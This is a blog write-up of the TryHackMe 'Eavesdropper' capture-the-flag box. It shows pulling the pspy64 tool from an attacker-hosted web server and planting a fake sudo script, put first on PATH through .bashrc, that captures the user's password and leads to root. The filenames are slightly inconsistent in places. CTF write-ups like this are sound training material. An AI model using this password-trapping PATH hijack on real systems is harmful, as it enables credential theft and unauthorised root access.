Email

TryHackMe Eavesdropper Writeup

This writeup will help you solve the Eavesdropper box on TryHackMe.

TryHackMe Eavesdropper Writeup – Root Flag

Usually, we must find a way to get into the box itself. However, to complete this box, it is sufficient to only capture the root flag. Download the private key of frank first. You can find this key in the description of the box. Ensure that this file is named id_rsa and that this key’s permissions are at least 600. This specific permission rules indicate that the current user only has write and read permissions for the key. Other local users should not have access to this key. That is why you do not grant them any permissions. So first change the permission of this key and then log in to the box.

chmod 600 id_rsa
ssh -i id_rsa frank@<BOX_IP>

Since this box is named Eavesdropper, let’s have a look at running processes. To view processes run by other users and even the root user, we need to transfer the pspy64 binary to the machine. You can find more information and the binary itself here. The next step is to start a web server on your local attacking machine. Do so by running:

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
python3 -m http.server

Now move to the terminal you used to log into the machine over SSH. Run the following commands to download the pspy64 binary, change permissions, and run the binary to view the running processes.

cd /tmp/
wget http://ATTACKING_IP:8000/pspy64 .
chmod +x psypy64
./psypy64

After running these commands, you will see the processes running on the box popping up one after the other. The most interesting process is the following one:

CMD: UID=0     PID=662    | sudo cat /etc/shadow

As you can see, this command utilizes sudo. This command run with the privileges of the root user. However, it is a strange that the root user would elevate its privileges since it already has the highest level of privileges on the system. However, it could be possible that the current user runs the sudo command in some cronjob. If so, we can create our own sudo command to elevate privileges. First, create the sudo binary:

mkdir ~/bin
vi ~/bin/sudo

After opening the vim editor, paste in the following code:

#!/bin/bash
read shadow_pass
echo $shadow_pass >> /tmp/frank_password

This small snippet catches the output of cat /etc/shadow and writes it to the /tmp/frank_password file. The only step left is to tell the machine to prioritize this sudo command over the original one. It might be helpful to put this in the ~/.bashrc file. This file contains scripts that run once the current user,
frank, logs into the system. First, make the new sudo runnable. Do so by running:

chmod +x /home/frank/bin/sudo

Next, put the following row in the /home/frank/.bashrc file:

export PATH=/home/frank/bin:$PATH

After editing the file, wait a minute and then check the contents of the /tmp/frank_password file. It should contain some sort of password. Run the following command to elevate your privileges:

sudo su

Provide the password you found in the /tmp/frank_password.txt file. You should now be root. Run the following command to get the flag.txt flag.

cat /root/flag.txt

The Eavesdropper box was fun to root! It involved some basic Linux process management, as well as providing your own custom commands to override default binaries for the current user.

About

Twitter | Facebook

Leave a Reply

Your email address will not be published. Required fields are marked *

Social Media

Categories

Popular Posts

  • TryHackMe Team
    Hacking, TryHackMe, Writeups

    TryHackMe Team Writeup

    TryHackMe Glitch
    Hacking, TryHackMe, Writeups

    TryHackMe GLITCH Writeup

    TryHackMe VulnNet
    Hacking, TryHackMe, Writeups

    TryHackMe VulnNet Writeup

    TryHackMe Couch
    Hacking, TryHackMe, Writeups

    TryHackMe Couch Writeup

    tModLoader
    Gaming, Modding

    Modding Terraria – Part 3 Adding a custom pet

    • Instagram